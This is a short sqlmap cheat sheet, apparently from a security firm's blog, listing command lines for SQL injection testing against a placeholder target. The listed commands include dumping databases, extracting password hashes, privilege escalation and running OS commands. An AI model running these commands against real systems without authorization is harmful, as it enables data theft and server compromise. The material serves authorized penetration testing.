https://www.abrictosecurity.com/blog/sqlmap-cheatsheet-and-examples/
sqlmap **-u '<http://target.server.com>'**
sqlmap -u '<http://target.server.com>' **--data='param1=blah¶m2=blah'**
sqlmap -u '<http://target.server.com>' **--cookie='JSESSIONID=09h76qoWC559GH1K7DSQHx'**
sqlmap -u '<http://target.server.com>' -r req.txt **--drop-set-cookie**
sqlmap -u '<http://target.server.com>' --data='param1=blah' **--level=5 --risk=3**
sqlmap -u '<http://target.server.com>' --data='param1=blah¶m2=blah' **-p param1**
sqlmap -u '<http://target.server.com>' -r req.txt **--random-agent**
sqlmap -u '<http://target.server.com>' -r req.txt **--dbms Oracle**
sqlmap **-r ./req.txt -p user --level=1 --risk=3 --passwords**
sqlmap -r ./req.txt --level=1 --risk=3 **--privesc**
sqlmap -r ./req.txt --level=1 --risk=3 **--os-cmd=whoami**
sqlmap -r ./req.txt --level=1 --risk=3 **--dump --delay=1**
Here are some useful options for your pillaging pleasure:
-r req.txt Specify a request stored in a text file, great for saved requests from BurpSuite.
–force-ssl Force SQLmap to use SSL or TLS for its requests.
–level=1 only test against the specified parameter, ignore all others.
–risk=3 Run all exploit attempts, even the dangerous ones (could damage database).
–delay Set a delay in-between requests, great for throttled connections.